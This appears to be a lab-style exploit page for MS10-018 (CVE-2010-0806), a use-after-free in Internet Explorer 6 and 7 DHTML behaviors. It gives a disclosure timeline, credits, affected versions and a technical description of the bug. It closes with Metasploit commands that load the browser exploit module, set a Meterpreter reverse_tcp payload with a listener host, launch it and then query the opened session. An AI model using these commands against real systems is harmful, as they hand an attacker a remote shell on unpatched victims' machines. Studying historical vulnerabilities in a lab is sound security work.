MS10-018 : Microsoft Internet Explorer DHTML Behaviors Use After Free

Timeline :

Microsoft MSA981374 advisory release the 2010-03-09
Exploit-DB PoC provided by Trancer the 2010-03-10
Metasploit PoC provided by duck the 2010-03-10
Microsoft patch “KB980182” provided the 2010-03-30

PoC provided by :

unknown
Trancer
Nanika
jduck

Reference(s) :

CVE-2010-0806
MS10-018

Affected version(s) :

Internet Explorer 6
Internet Explorer 7

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB980182

Description :

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected

Commands :

use windows/browser/ms10_018_ie_behaviors
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig